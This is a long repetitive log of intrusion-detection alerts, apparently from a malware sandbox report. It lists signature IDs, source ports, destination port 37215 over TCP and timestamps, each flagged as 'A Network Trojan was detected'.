          SID:2829579
          Source Port:47088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038484
          SID:2835222
          Source Port:57286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114156
          SID:2835222
          Source Port:43426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192409
          SID:2835222
          Source Port:59654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108946
          SID:2829579
          Source Port:37516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911918
          SID:2829579
          Source Port:54640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747642
          SID:2835222
          Source Port:43126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745566
          SID:2835222
          Source Port:40166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894138
          SID:2835222
          Source Port:46158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734330
          SID:2835222
          Source Port:36356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184173
          SID:2829579
          Source Port:46800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406566
          SID:2829579
          Source Port:53894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784005
          SID:2835222
          Source Port:57324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731746
          SID:2829579
          Source Port:49144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262151
          SID:2835222
          Source Port:56680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179801
          SID:2835222
          Source Port:60560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172895
          SID:2829579
          Source Port:52912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808234
          SID:2835222
          Source Port:52672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602306
          SID:2829579
          Source Port:45144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888617
          SID:2829579
          Source Port:45826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162860
          SID:2835222
          Source Port:58056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259699
          SID:2829579
          Source Port:57636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495949
          SID:2829579
          Source Port:48052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786521
          SID:2835222
          Source Port:54526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241015
          SID:2835222
          Source Port:49372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270051
          SID:2829579
          Source Port:34908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.185534
          SID:2829579
          Source Port:40950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.465901
          SID:2829579
          Source Port:39586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262627
          SID:2835222
          Source Port:59374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014821
          SID:2835222
          Source Port:41710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112164
          SID:2829579
          Source Port:37746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113620
          SID:2829579
          Source Port:57476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893831
          SID:2829579
          Source Port:55806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016580
          SID:2829579
          Source Port:44534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355559
          SID:2835222
          Source Port:33888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179738
          SID:2829579
          Source Port:39136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158602
          SID:2829579
          Source Port:56566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159159
          SID:2835222
          Source Port:55106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783964
          SID:2835222
          Source Port:39130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005401
          SID:2835222
          Source Port:33258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131484
          SID:2835222
          Source Port:41928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789088
          SID:2829579
          Source Port:38058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884367
          SID:2835222
          Source Port:34176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671280
          SID:2835222
          Source Port:48564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273290
          SID:2835222
          Source Port:54462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704237
          SID:2835222
          Source Port:49852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241613
          SID:2829579
          Source Port:56538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552491
          SID:2835222
          Source Port:53272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299849
          SID:2829579
          Source Port:56460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264696
          SID:2829579
          Source Port:44816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158298
          SID:2835222
          Source Port:33252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.125887
          SID:2835222
          Source Port:32834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837343
          SID:2829579
          Source Port:47572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742355
          SID:2829579
          Source Port:36188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168333
          SID:2835222
          Source Port:45370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705182
          SID:2829579
          Source Port:48102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.058247
          SID:2835222
          Source Port:53000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.813593
          SID:2835222
          Source Port:39466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895919
          SID:2829579
          Source Port:34170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115330
          SID:2829579
          Source Port:38816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159910
          SID:2829579
          Source Port:50892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810473
          SID:2829579
          Source Port:44940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407223
          SID:2835222
          Source Port:58444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447109
          SID:2829579
          Source Port:36424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264502
          SID:2835222
          Source Port:49468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745434
          SID:2835222
          Source Port:44744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161412
          SID:2829579
          Source Port:37346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862947
          SID:2829579
          Source Port:55520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599885
          SID:2835222
          Source Port:57832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730572
          SID:2835222
          Source Port:53224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352882
          SID:2829579
          Source Port:52154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044170
          SID:2829579
          Source Port:55296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176348
          SID:2835222
          Source Port:34742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179942
          SID:2835222
          Source Port:45332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.154779
          SID:2829579
          Source Port:47332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160102
          SID:2835222
          Source Port:50474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444846
          SID:2829579
          Source Port:51654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351490
          SID:2829579
          Source Port:59028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602305
          SID:2835222
          Source Port:34478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394172
          SID:2829579
          Source Port:45154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603030
          SID:2835222
          Source Port:46586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271689
          SID:2829579
          Source Port:40576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739956
          SID:2829579
          Source Port:41090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442104
          SID:2835222
          Source Port:33238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516350
          SID:2829579
          Source Port:59562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742877
          SID:2829579
          Source Port:59576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020819
          SID:2835222
          Source Port:57824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891231
          SID:2835222
          Source Port:44920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550820
          SID:2829579
          Source Port:42124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670204
          SID:2835222
          Source Port:38494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892353
          SID:2829579
          Source Port:42876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.809128
          SID:2829579
          Source Port:54736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670193
          SID:2835222
          Source Port:60600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468474
          SID:2835222
          Source Port:35388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740565
          SID:2829579
          Source Port:34152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351599
          SID:2829579
          Source Port:44304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551035
          SID:2829579
          Source Port:57958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042920
          SID:2829579
          Source Port:34484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108233
          SID:2829579
          Source Port:33192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670172
          SID:2829579
          Source Port:53290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.183736
          SID:2829579
          Source Port:59968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402603
          SID:2835222
          Source Port:58794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306538
          SID:2829579
          Source Port:47022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129575
          SID:2835222
          Source Port:40464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262661
          SID:2835222
          Source Port:34028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.823799
          SID:2829579
          Source Port:37802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264596
          SID:2829579
          Source Port:54230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.185564
          SID:2829579
          Source Port:58602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517241
          SID:2829579
          Source Port:37784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160776
          SID:2829579
          Source Port:40562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158975
          SID:2829579
          Source Port:58514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158052
          SID:2829579
          Source Port:56464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781741
          SID:2829579
          Source Port:34626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272918
          SID:2829579
          Source Port:43486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.055381
          SID:2835222
          Source Port:38242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.160402
          SID:2835222
          Source Port:38706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041961
          SID:2829579
          Source Port:52512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378085
          SID:2829579
          Source Port:59124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509422
          SID:2835222
          Source Port:35228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545666
          SID:2829579
          Source Port:36410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038259
          SID:2829579
          Source Port:58994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517870
          SID:2829579
          Source Port:59800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158261
          SID:2835222
          Source Port:51750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782346
          SID:2829579
          Source Port:48268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517801
          SID:2835222
          Source Port:54214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732259
          SID:2835222
          Source Port:38742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855444
          SID:2835222
          Source Port:51206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.913518
          SID:2829579
          Source Port:36800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356838
          SID:2829579
          Source Port:42700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306243
          SID:2835222
          Source Port:35796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.843152
          SID:2835222
          Source Port:49724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515551
          SID:2835222
          Source Port:55208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465437
          SID:2835222
          Source Port:40900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448942
          SID:2835222
          Source Port:32796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108102
          SID:2835222
          Source Port:53778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175910
          SID:2835222
          Source Port:39214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602137
          SID:2835222
          Source Port:33722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599971
          SID:2835222
          Source Port:48090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.496082
          SID:2835222
          Source Port:44226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460759
          SID:2835222
          Source Port:52486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860998
          SID:2829579
          Source Port:53872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463791
          SID:2829579
          Source Port:33474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176115
          SID:2835222
          Source Port:49630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733847
          SID:2829579
          Source Port:42328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897225
          SID:2829579
          Source Port:60382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733728
          SID:2835222
          Source Port:46406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240515
          SID:2835222
          Source Port:39164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351046
          SID:2829579
          Source Port:50794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039459
          SID:2829579
          Source Port:36656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016647
          SID:2835222
          Source Port:47886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516545
          SID:2835222
          Source Port:51906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177237
          SID:2829579
          Source Port:48044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.834549
          SID:2835222
          Source Port:44378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513656
          SID:2829579
          Source Port:38926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729634
          SID:2835222
          Source Port:36210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161142
          SID:2829579
          Source Port:44326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787883
          SID:2835222
          Source Port:48712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410983
          SID:2829579
          Source Port:47214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706698
          SID:2829579
          Source Port:48174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106323
          SID:2829579
          Source Port:53116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269259
          SID:2835222
          Source Port:46302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912082
          SID:2835222
          Source Port:54730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729837
          SID:2835222
          Source Port:45340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542320
          SID:2835222
          Source Port:53038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741815
          SID:2835222
          Source Port:52208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.155573
          SID:2835222
          Source Port:45328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857352
          SID:2835222
          Source Port:45452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542824
          SID:2829579
          Source Port:49712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513135
          SID:2835222
          Source Port:53568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407438
          SID:2835222
          Source Port:57272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471444
          SID:2829579
          Source Port:58358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270031
          SID:2835222
          Source Port:39878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259948
          SID:2835222
          Source Port:42162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.793392
          SID:2829579
          Source Port:39506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793495
          SID:2829579
          Source Port:44928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862060
          SID:2829579
          Source Port:32832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732238
          SID:2829579
          Source Port:41520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191408
          SID:2829579
          Source Port:45900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860418
          SID:2829579
          Source Port:58084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780695
          SID:2829579
          Source Port:33982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260707
          SID:2829579
          Source Port:46910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511916
          SID:2829579
          Source Port:48408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743023
          SID:2829579
          Source Port:34760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741726
          SID:2829579
          Source Port:59832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.496027
          SID:2829579
          Source Port:41458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174658
          SID:2829579
          Source Port:35720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403904
          SID:2829579
          Source Port:56846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.735484
          SID:2829579
          Source Port:34898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465857
          SID:2829579
          Source Port:51450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021040
          SID:2829579
          Source Port:43166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037352
          SID:2829579
          Source Port:34440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467711
          SID:2829579
          Source Port:46208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554262
          SID:2829579
          Source Port:40794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.152968
          SID:2829579
          Source Port:43378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353198
          SID:2835222
          Source Port:38424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747971
          SID:2835222
          Source Port:59586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108316
          SID:2829579
          Source Port:33728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740261
          SID:2835222
          Source Port:45618
          Destination Port:37215
